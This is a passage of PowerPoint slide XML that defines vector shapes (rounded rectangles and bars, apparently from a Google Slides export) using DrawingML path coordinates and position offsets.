                    <a:pt x="115" y="0"/>
                    <a:pt x="1" y="137"/>
                    <a:pt x="1" y="297"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="2625"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2785"/>
                    <a:pt x="115" y="2922"/>
                    <a:pt x="274" y="2922"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2625" y="2922"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2785" y="2922"/>
                    <a:pt x="2922" y="2785"/>
                    <a:pt x="2922" y="2625"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2922" y="297"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2922" y="137"/>
                    <a:pt x="2785" y="0"/>
                    <a:pt x="2625"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1" name="Google Shape;1334;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECE57FB8-8B21-D5CE-3FCA-6646DDEA0994}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5984455" y="2652996"/>
              <a:ext cx="57634" cy="11259"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2923" h="571" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="297" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="0"/>
                    <a:pt x="1" y="114"/>
                    <a:pt x="1" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="434"/>
                    <a:pt x="138" y="571"/>
                    <a:pt x="297" y="571"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2648" y="571"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2785" y="571"/>
                    <a:pt x="2922" y="434"/>
                    <a:pt x="2922" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2922" y="114"/>
                    <a:pt x="2785" y="0"/>
                    <a:pt x="2648"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2" name="Google Shape;1335;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03ACB14C-E6B1-4EF2-CB6B-5B8F30C86564}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5943956" y="2720509"/>
              <a:ext cx="863686" cy="33323"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="43803" h="1690" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43802" y="1689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43802" y="0"/>
                  </a:ln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3" name="Google Shape;1336;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DF89B81-CC72-8F57-C40B-674814042811}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5943956" y="2798807"/>
              <a:ext cx="863686" cy="33323"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="43803" h="1690" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43802" y="1690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43802"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4" name="Google Shape;1337;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1817F30-D4F4-7A37-C7C0-12F06E8E9BF9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5943956" y="2877579"/>
              <a:ext cx="535133" cy="33323"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="27140" h="1690" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27140" y="1689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27140"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5" name="Google Shape;1338;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77D50621-FADC-0D1F-853E-D07AF5B913DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5943956" y="2955877"/>
              <a:ext cx="387074" cy="33323"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="19631" h="1690" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19630" y="1690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19630" y="1"/>
                  </a:ln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6" name="Google Shape;1339;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2A430EF-9F2B-E729-4163-0B156E6568A0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6372417" y="2955877"/>
              <a:ext cx="217839" cy="33323"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11048" h="1690" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11048" y="1690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11048" y="1"/>
                  </a:ln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7" name="Google Shape;1340;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10BCCDA7-377D-33C4-2683-1692F7E58EFE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5943956" y="3034648"/>
              <a:ext cx="235407" cy="32869"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11939" h="1667" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11938" y="1666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11938"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8" name="Google Shape;1341;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27CF2C7A-2546-23E6-4719-42A17E11DF97}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6964692" y="1818592"/>
              <a:ext cx="1301592" cy="169689"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="66012" h="8606" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="8605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66011" y="8605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66011" y="0"/>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1342;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEB82939-5EAE-F38D-1DFC-0CD624313691}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6964692" y="1988261"/>
              <a:ext cx="1301592" cy="24312"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="66012" h="1233" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66011" y="1233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66011" y="0"/>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0" name="Google Shape;1343;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D169975-A348-4A48-D448-75204AC9A8D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7006533" y="1860432"/>
              <a:ext cx="57634" cy="11278"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2923" h="572" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="298" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="1"/>
                    <a:pt x="1" y="138"/>
                    <a:pt x="1" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="457"/>
                    <a:pt x="138" y="572"/>
                    <a:pt x="298" y="572"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2626" y="572"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2786" y="572"/>
                    <a:pt x="2923" y="457"/>
                    <a:pt x="2923" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2923" y="138"/>
                    <a:pt x="2786" y="1"/>
                    <a:pt x="2626"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1" name="Google Shape;1344;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{573DFDE6-EAFD-D55E-20EF-F55C84F9646A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7099264" y="1860432"/>
              <a:ext cx="57161" cy="11278"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2899" h="572" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="274" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="1"/>
                    <a:pt x="0" y="138"/>
                    <a:pt x="0" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="457"/>
                    <a:pt x="114" y="572"/>
                    <a:pt x="274" y="572"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2625" y="572"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2785" y="572"/>
                    <a:pt x="2899" y="457"/>
                    <a:pt x="2899" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2899" y="138"/>
                    <a:pt x="2785" y="1"/>
                    <a:pt x="2625"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2" name="Google Shape;1345;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75AA3428-BB6F-7C3E-F867-AEC9F1A5BFF0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7006533" y="1842430"/>
              <a:ext cx="57634" cy="29280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2923" h="1485" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2352" y="572"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2352" y="914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572" y="914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572" y="572"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="298" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="1"/>
                    <a:pt x="1" y="138"/>
                    <a:pt x="1" y="298"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="1211"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1370"/>
                    <a:pt x="138" y="1485"/>
                    <a:pt x="298" y="1485"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2626" y="1485"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2786" y="1485"/>
                    <a:pt x="2923" y="1370"/>
                    <a:pt x="2923" y="1211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2923" y="298"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2923" y="138"/>
                    <a:pt x="2786" y="1"/>
                    <a:pt x="2626"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3" name="Google Shape;1346;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A024AE91-DA0F-615F-FAFD-3503A1AD0C75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7058291" y="1906788"/>
              <a:ext cx="462691" cy="32889"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="23466" h="1668" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23465" y="1667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23465" y="1"/>
                  </a:ln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35" name="Google Shape;1347;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66D0B1A2-70D1-EE2D-F449-19C7E1DCB72F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7548863" y="1906788"/>
              <a:ext cx="194454" cy="32889"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9862" h="1668" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9861" y="1667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9861"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36" name="Google Shape;1348;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC3CBA50-6F86-7A27-E9B1-4404FE21BD5F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6964692" y="2047216"/>
              <a:ext cx="1301592" cy="169235"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="66012" h="8583" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="8583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66011" y="8583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66011" y="0"/>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37" name="Google Shape;1349;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD707344-9D89-2D85-9F34-DB26E30142F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6964692" y="2216431"/>
              <a:ext cx="1301592" cy="24785"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="66012" h="1257" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66011" y="1256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66011" y="1"/>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38" name="Google Shape;1350;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B10B8E3-2434-61EB-F6F1-7145A4E52647}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7006533" y="2089076"/>
              <a:ext cx="57634" cy="11259"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2923" h="571" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="298" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="0"/>
                    <a:pt x="1" y="114"/>
                    <a:pt x="1" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="434"/>
                    <a:pt x="138" y="571"/>
                    <a:pt x="298" y="571"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2626" y="571"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2786" y="571"/>
                    <a:pt x="2923" y="434"/>
                    <a:pt x="2923" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2923" y="114"/>
                    <a:pt x="2786" y="0"/>
                    <a:pt x="2626"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39" name="Google Shape;1351;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE516B9D-5B59-B2E2-779A-19C464005CCD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7099264" y="2089076"/>
              <a:ext cx="57161" cy="11259"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2899" h="571" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="274" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="0"/>
                    <a:pt x="0" y="114"/>
                    <a:pt x="0" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="434"/>
                    <a:pt x="114" y="571"/>
                    <a:pt x="274" y="571"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2625" y="571"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2785" y="571"/>
                    <a:pt x="2899" y="434"/>
                    <a:pt x="2899" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2899" y="114"/>
                    <a:pt x="2785" y="0"/>
                    <a:pt x="2625"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40" name="Google Shape;1352;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DB1D4FF-8999-9CA0-FAB4-19A376A5DFCE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7006533" y="2071074"/>
              <a:ext cx="57634" cy="29261"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2923" h="1484" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2352" y="571"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2352" y="913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572" y="913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572" y="571"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="298" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="0"/>
                    <a:pt x="1" y="137"/>
                    <a:pt x="1" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="1187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1347"/>
                    <a:pt x="138" y="1484"/>
                    <a:pt x="298" y="1484"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2626" y="1484"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2786" y="1484"/>
                    <a:pt x="2923" y="1347"/>
                    <a:pt x="2923" y="1187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2923" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2923" y="137"/>
                    <a:pt x="2786" y="0"/>
                    <a:pt x="2626"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41" name="Google Shape;1353;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AC7C614-0354-A6DF-51F9-B8A8990AC6C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7058291" y="2134978"/>
              <a:ext cx="211549" cy="33323"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="10729" h="1690" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10729" y="1689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10729" y="0"/>
                  </a:ln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42" name="Google Shape;1354;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC1D5F40-B817-E398-ECB0-2776807BA6A9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7528160" y="2134978"/>
              <a:ext cx="617493" cy="33323"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="31317" h="1690" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31317" y="1689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31317" y="0"/>
                  </a:ln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43" name="Google Shape;1355;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{769A92B1-72CE-B02A-2E15-339F4037CEBB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7304938" y="2134978"/>
              <a:ext cx="193981" cy="33323"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9838" h="1690" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9838" y="1689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9838"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44" name="Google Shape;1356;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCB0CB3A-CB5A-B341-8EBE-D040D02FA417}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6964692" y="2275387"/>
              <a:ext cx="1301592" cy="169689"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
